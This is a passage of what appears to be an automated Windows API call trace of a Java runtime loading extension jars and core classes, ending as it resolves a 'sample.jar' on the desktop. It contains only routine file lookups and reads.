lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x39 [0100.184] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3edb58, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3edb58, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x8177)) returned 1 [0100.185] free (_Block=0x122292e0) [0100.186] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.186] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned 0x38 [0100.186] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3eef67, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3eef67, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3d113, dwReserved0=0x4, dwReserved1=0x12130000, cFileName="sunpkcs11.jar", cAlternateFileName="SUNPKC~1.JAR")) returned 0x426320 [0100.187] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0100.187] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.187] wcslen (_String="sunpkcs11.jar") returned 0xd [0100.187] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned 0x38 [0100.188] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned 0x38 [0100.188] malloc (_Size=0x7c) returned 0x122292e0 [0100.188] wcscpy (in: _Dest=0x122292e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" [0100.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x39 [0100.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3eef67, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3eef67, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3d113)) returned 1 [0100.189] free (_Block=0x122292e0) [0100.190] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.190] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned 0x34 [0100.190] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3f033f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3f033f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x10d63, dwReserved0=0x0, dwReserved1=0x6f7d6f98, cFileName="zipfs.jar", cAlternateFileName="")) returned 0x425b40 [0100.190] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0100.190] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.190] wcslen (_String="zipfs.jar") returned 0x9 [0100.191] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned 0x34 [0100.191] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned 0x34 [0100.191] malloc (_Size=0x74) returned 0x1221cbb0 [0100.191] wcscpy (in: _Dest=0x1221cbb0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" [0100.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x35 [0100.192] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\zipfs.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3f033f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3f033f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x10d63)) returned 1 [0100.192] free (_Block=0x1221cbb0) [0100.192] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x1b [0100.192] malloc (_Size=0x42) returned 0x121d93f0 [0100.193] wcscpy (in: _Dest=0x121d93f0, _Source="C:\\Windows\\Sun\\Java\\lib\\ext" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext") returned="C:\\Windows\\Sun\\Java\\lib\\ext" [0100.193] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x1b [0100.193] malloc (_Size=0x3c) returned 0x121d9210 [0100.193] wcscpy (in: _Dest=0x121d9210, _Source="C:\\Windows\\Sun\\Java\\lib\\ext" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext") returned="C:\\Windows\\Sun\\Java\\lib\\ext" [0100.193] free (_Block=0x121d93f0) [0100.193] GetFileAttributesW (lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext" (normalized: "c:\\windows\\sun\\java\\lib\\ext")) returned 0xffffffff [0100.194] free (_Block=0x121d9210) [0100.198] strlen (_Str="java/security/ProtectionDomain$JavaSecurityAccessImpl.class") returned 0x3b [0100.198] malloc (_Size=0x48) returned 0x121d8fe0 [0100.198] malloc (_Size=0xa0) returned 0x122292e0 [0100.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419de8, lpNewFilePointer=0x208c750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c750*=54631912) returned 1 [0100.199] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c720, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208c720*=0xa0, lpOverlapped=0x0) returned 1 [0100.200] malloc (_Size=0x3c) returned 0x121d94e0 [0100.201] free (_Block=0x122292e0) [0100.201] strlen (_Str="java/security/ProtectionDomain$JavaSecurityAccessImpl.class") returned 0x3b [0100.201] strcpy (in: _Dest=0x208c8d0, _Source="java/security/ProtectionDomain$JavaSecurityAccessImpl.class" | out: _Dest="java/security/ProtectionDomain$JavaSecurityAccessImpl.class") returned="java/security/ProtectionDomain$JavaSecurityAccessImpl.class" [0100.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313ab68, lpNewFilePointer=0x208c350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c350*=51620712) returned 1 [0100.201] ReadFile (in: hFile=0x134, lpBuffer=0x208c3a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c320, lpOverlapped=0x0 | out: lpBuffer=0x208c3a0*, lpNumberOfBytesRead=0x208c320*=0x1e, lpOverlapped=0x0) returned 1 [0100.207] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313abc1, lpNewFilePointer=0x208c3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3b0*=51620801) returned 1 [0100.207] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x6d4, lpNumberOfBytesRead=0x208c380, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c380*=0x6d4, lpOverlapped=0x0) returned 1 [0100.207] free (_Block=0x121d7a30) [0100.208] free (_Block=0x121d9cb0) [0100.209] strlen (_Str="sun/misc/JavaSecurityAccess.class") returned 0x21 [0100.209] malloc (_Size=0x48) returned 0x121d9da0 [0100.209] malloc (_Size=0xa0) returned 0x122292e0 [0100.209] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419d99, lpNewFilePointer=0x208bc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc90*=54631833) returned 1 [0100.210] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc60, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208bc60*=0xa0, lpOverlapped=0x0) returned 1 [0100.211] malloc (_Size=0x22) returned 0x121d7e80 [0100.211] free (_Block=0x122292e0) [0100.211] strlen (_Str="sun/misc/JavaSecurityAccess.class") returned 0x21 [0100.211] strcpy (in: _Dest=0x208be10, _Source="sun/misc/JavaSecurityAccess.class" | out: _Dest="sun/misc/JavaSecurityAccess.class") returned="sun/misc/JavaSecurityAccess.class" [0100.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a8c8, lpNewFilePointer=0x208b890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b890*=51620040) returned 1 [0100.212] ReadFile (in: hFile=0x134, lpBuffer=0x208b8e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b860, lpOverlapped=0x0 | out: lpBuffer=0x208b8e0*, lpNumberOfBytesRead=0x208b860*=0x1e, lpOverlapped=0x0) returned 1 [0100.213] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a907, lpNewFilePointer=0x208b8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8f0*=51620103) returned 1 [0100.213] ReadFile (in: hFile=0x134, lpBuffer=0x21032b0, nNumberOfBytesToRead=0x261, lpNumberOfBytesRead=0x208b8c0, lpOverlapped=0x0 | out: lpBuffer=0x21032b0*, lpNumberOfBytesRead=0x208b8c0*=0x261, lpOverlapped=0x0) returned 1 [0100.213] free (_Block=0x121d94e0) [0100.214] free (_Block=0x121d8fe0) [0100.229] strlen (_Str="java/security/ProtectionDomain$2.class") returned 0x26 [0100.230] malloc (_Size=0x48) returned 0x121d9b70 [0100.230] malloc (_Size=0xa0) returned 0x122292e0 [0100.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419d45, lpNewFilePointer=0x208c750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c750*=54631749) returned 1 [0100.230] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c720, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208c720*=0xa0, lpOverlapped=0x0) returned 1 [0100.232] malloc (_Size=0x27) returned 0x121d7af0 [0100.232] free (_Block=0x122292e0) [0100.232] strlen (_Str="java/security/ProtectionDomain$2.class") returned 0x26 [0100.232] strcpy (in: _Dest=0x208c8d0, _Source="java/security/ProtectionDomain$2.class" | out: _Dest="java/security/ProtectionDomain$2.class") returned="java/security/ProtectionDomain$2.class" [0100.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a55c, lpNewFilePointer=0x208c350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c350*=51619164) returned 1 [0100.233] ReadFile (in: hFile=0x134, lpBuffer=0x208c3a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c320, lpOverlapped=0x0 | out: lpBuffer=0x208c3a0*, lpNumberOfBytesRead=0x208c320*=0x1e, lpOverlapped=0x0) returned 1 [0100.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a5a0, lpNewFilePointer=0x208c3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3b0*=51619232) returned 1 [0100.234] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x328, lpNumberOfBytesRead=0x208c380, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c380*=0x328, lpOverlapped=0x0) returned 1 [0100.235] free (_Block=0x121d7e80) [0100.235] free (_Block=0x121d9da0) [0100.236] strlen (_Str="sun/misc/JavaSecurityProtectionDomainAccess.class") returned 0x31 [0100.236] malloc (_Size=0x48) returned 0x121d9210 [0100.236] malloc (_Size=0xa0) returned 0x122292e0 [0100.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419ce6, lpNewFilePointer=0x208bc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc90*=54631654) returned 1 [0100.237] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc60, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208bc60*=0xa0, lpOverlapped=0x0) returned 1 [0100.238] malloc (_Size=0x32) returned 0x121daab0 [0100.238] free (_Block=0x122292e0) [0100.238] strlen (_Str="sun/misc/JavaSecurityProtectionDomainAccess.class") returned 0x31 [0100.239] strcpy (in: _Dest=0x208be10, _Source="sun/misc/JavaSecurityProtectionDomainAccess.class" | out: _Dest="sun/misc/JavaSecurityProtectionDomainAccess.class") returned="sun/misc/JavaSecurityProtectionDomainAccess.class" [0100.239] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a37b, lpNewFilePointer=0x208b890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b890*=51618683) returned 1 [0100.239] ReadFile (in: hFile=0x134, lpBuffer=0x208b8e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b860, lpOverlapped=0x0 | out: lpBuffer=0x208b8e0*, lpNumberOfBytesRead=0x208b860*=0x1e, lpOverlapped=0x0) returned 1 [0100.240] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a3ca, lpNewFilePointer=0x208b8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8f0*=51618762) returned 1 [0100.240] ReadFile (in: hFile=0x134, lpBuffer=0x2102f30, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x208b8c0, lpOverlapped=0x0 | out: lpBuffer=0x2102f30*, lpNumberOfBytesRead=0x208b8c0*=0x192, lpOverlapped=0x0) returned 1 [0100.241] free (_Block=0x121d7af0) [0100.241] free (_Block=0x121d9b70) [0100.255] strlen (_Str="java/security/ProtectionDomain$Key.class") returned 0x28 [0100.255] malloc (_Size=0x48) returned 0x121d9800 [0100.255] malloc (_Size=0xa0) returned 0x122292e0 [0100.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419c90, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=54631568) returned 1 [0100.255] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cc90*=0xa0, lpOverlapped=0x0) returned 1 [0100.256] malloc (_Size=0x29) returned 0x121d9f30 [0100.257] free (_Block=0x122292e0) [0100.257] strlen (_Str="java/security/ProtectionDomain$Key.class") returned 0x28 [0100.257] strcpy (in: _Dest=0x208ce40, _Source="java/security/ProtectionDomain$Key.class" | out: _Dest="java/security/ProtectionDomain$Key.class") returned="java/security/ProtectionDomain$Key.class" [0100.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a257, lpNewFilePointer=0x208c8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8c0*=51618391) returned 1 [0100.257] ReadFile (in: hFile=0x134, lpBuffer=0x208c910, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c890, lpOverlapped=0x0 | out: lpBuffer=0x208c910*, lpNumberOfBytesRead=0x208c890*=0x1e, lpOverlapped=0x0) returned 1 [0100.258] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a29d, lpNewFilePointer=0x208c920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c920*=51618461) returned 1 [0100.259] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x208c8f0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c8f0*=0xde, lpOverlapped=0x0) returned 1 [0100.259] free (_Block=0x121daab0) [0100.260] free (_Block=0x121d9210) [0100.266] malloc (_Size=0x48) returned 0x121d9120 [0100.266] malloc (_Size=0xa0) returned 0x122292e0 [0100.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419c45, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=54631493) returned 1 [0100.266] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cc90*=0xa0, lpOverlapped=0x0) returned 1 [0100.267] malloc (_Size=0x1e) returned 0x121d7a30 [0100.268] free (_Block=0x122292e0) [0100.268] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a064, lpNewFilePointer=0x208c8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8c0*=51617892) returned 1 [0100.268] ReadFile (in: hFile=0x134, lpBuffer=0x208c910, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c890, lpOverlapped=0x0 | out: lpBuffer=0x208c910*, lpNumberOfBytesRead=0x208c890*=0x1e, lpOverlapped=0x0) returned 1 [0100.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313a09f, lpNewFilePointer=0x208c920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c920*=51617951) returned 1 [0100.270] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1b8, lpNumberOfBytesRead=0x208c8f0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208c8f0*=0x1b8, lpOverlapped=0x0) returned 1 [0100.270] free (_Block=0x121d9f30) [0100.271] free (_Block=0x121d9800) [0100.279] strlen (_Str="java/util/HashSet.class") returned 0x17 [0100.279] malloc (_Size=0x48) returned 0x121d8fe0 [0100.279] malloc (_Size=0xa0) returned 0x122292e0 [0100.279] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419c00, lpNewFilePointer=0x208cd50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd50*=54631424) returned 1 [0100.279] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd20, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cd20*=0xa0, lpOverlapped=0x0) returned 1 [0100.280] malloc (_Size=0x18) returned 0x1221b460 [0100.281] free (_Block=0x122292e0) [0100.281] strlen (_Str="java/util/HashSet.class") returned 0x17 [0100.281] strcpy (in: _Dest=0x208ced0, _Source="java/util/HashSet.class" | out: _Dest="java/util/HashSet.class") returned="java/util/HashSet.class" [0100.281] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313901a, lpNewFilePointer=0x208c950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c950*=51613722) returned 1 [0100.281] ReadFile (in: hFile=0x134, lpBuffer=0x208c9a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c920, lpOverlapped=0x0 | out: lpBuffer=0x208c9a0*, lpNumberOfBytesRead=0x208c920*=0x1e, lpOverlapped=0x0) returned 1 [0100.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313904f, lpNewFilePointer=0x208c9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9b0*=51613775) returned 1 [0100.284] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1015, lpNumberOfBytesRead=0x208c980, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c980*=0x1015, lpOverlapped=0x0) returned 1 [0100.284] free (_Block=0x121d7a30) [0100.285] free (_Block=0x121d9120) [0100.331] strlen (_Str="sun/misc/URLClassPath.class") returned 0x1b [0100.331] malloc (_Size=0x48) returned 0x121d9080 [0100.331] malloc (_Size=0xa0) returned 0x122292e0 [0100.331] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419bb7, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54631351) returned 1 [0100.331] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0100.332] malloc (_Size=0x1c) returned 0x121d7a30 [0100.332] free (_Block=0x122292e0) [0100.333] strlen (_Str="sun/misc/URLClassPath.class") returned 0x1b [0100.333] strcpy (in: _Dest=0x208d000, _Source="sun/misc/URLClassPath.class" | out: _Dest="sun/misc/URLClassPath.class") returned="sun/misc/URLClassPath.class" [0100.333] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31366d2, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=51603154) returned 1 [0100.333] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0100.335] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313670b, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=51603211) returned 1 [0100.335] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x290f, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cab0*=0x290f, lpOverlapped=0x0) returned 1 [0100.336] free (_Block=0x1221b460) [0100.336] free (_Block=0x121d8fe0) [0100.351] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0100.352] strlen (_Str="sun/net/www/protocol/jar/Handler.class") returned 0x26 [0100.352] malloc (_Size=0x48) returned 0x121d93f0 [0100.352] malloc (_Size=0xa0) returned 0x122292e0 [0100.352] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419b63, lpNewFilePointer=0x208d2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2c0*=54631267) returned 1 [0100.352] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d290, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208d290*=0xa0, lpOverlapped=0x0) returned 1 [0100.353] malloc (_Size=0x27) returned 0x121d7af0 [0100.354] free (_Block=0x122292e0) [0100.354] strlen (_Str="sun/net/www/protocol/jar/Handler.class") returned 0x26 [0100.354] strcpy (in: _Dest=0x208d440, _Source="sun/net/www/protocol/jar/Handler.class" | out: _Dest="sun/net/www/protocol/jar/Handler.class") returned="sun/net/www/protocol/jar/Handler.class" [0100.355] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3135a72, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=51599986) returned 1 [0100.355] ReadFile (in: hFile=0x134, lpBuffer=0x208cf10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x208cf10*, lpNumberOfBytesRead=0x208ce90*=0x1e, lpOverlapped=0x0) returned 1 [0100.356] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3135ab6, lpNewFilePointer=0x208cf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf20*=51600054) returned 1 [0100.357] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xc1c, lpNumberOfBytesRead=0x208cef0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cef0*=0xc1c, lpOverlapped=0x0) returned 1 [0100.357] free (_Block=0x121d7a30) [0100.357] free (_Block=0x121d9080) [0100.389] strlen (_Str="sun/misc/Launcher$AppClassLoader$1.class") returned 0x28 [0100.389] malloc (_Size=0x48) returned 0x121d9850 [0100.389] malloc (_Size=0xa0) returned 0x122292e0 [0100.389] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419b0d, lpNewFilePointer=0x208dc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc30*=54631181) returned 1 [0100.389] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc00, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208dc00*=0xa0, lpOverlapped=0x0) returned 1 [0100.391] malloc (_Size=0x29) returned 0x121da3f0 [0100.391] free (_Block=0x122292e0) [0100.391] strlen (_Str="sun/misc/Launcher$AppClassLoader$1.class") returned 0x28 [0100.391] strcpy (in: _Dest=0x208ddb0, _Source="sun/misc/Launcher$AppClassLoader$1.class" | out: _Dest="sun/misc/Launcher$AppClassLoader$1.class") returned="sun/misc/Launcher$AppClassLoader$1.class" [0100.391] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31355e6, lpNewFilePointer=0x208d830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d830*=51598822) returned 1 [0100.391] ReadFile (in: hFile=0x134, lpBuffer=0x208d880, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d800, lpOverlapped=0x0 | out: lpBuffer=0x208d880*, lpNumberOfBytesRead=0x208d800*=0x1e, lpOverlapped=0x0) returned 1 [0100.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313562c, lpNewFilePointer=0x208d890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d890*=51598892) returned 1 [0100.393] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x446, lpNumberOfBytesRead=0x208d860, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d860*=0x446, lpOverlapped=0x0) returned 1 [0100.393] free (_Block=0x121d7af0) [0100.393] free (_Block=0x121d93f0) [0100.401] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0100.401] malloc (_Size=0x800) returned 0x122292e0 [0100.401] _wfullpath (in: _Buffer=0x122292e0, _Path="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar", _BufferCount=0x400 | out: _Buffer="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" [0100.401] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0100.401] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0100.401] wcslen (_String="C:\\Users") returned 0x8 [0100.401] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x208d280 | out: lpFindFileData=0x208d280*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, 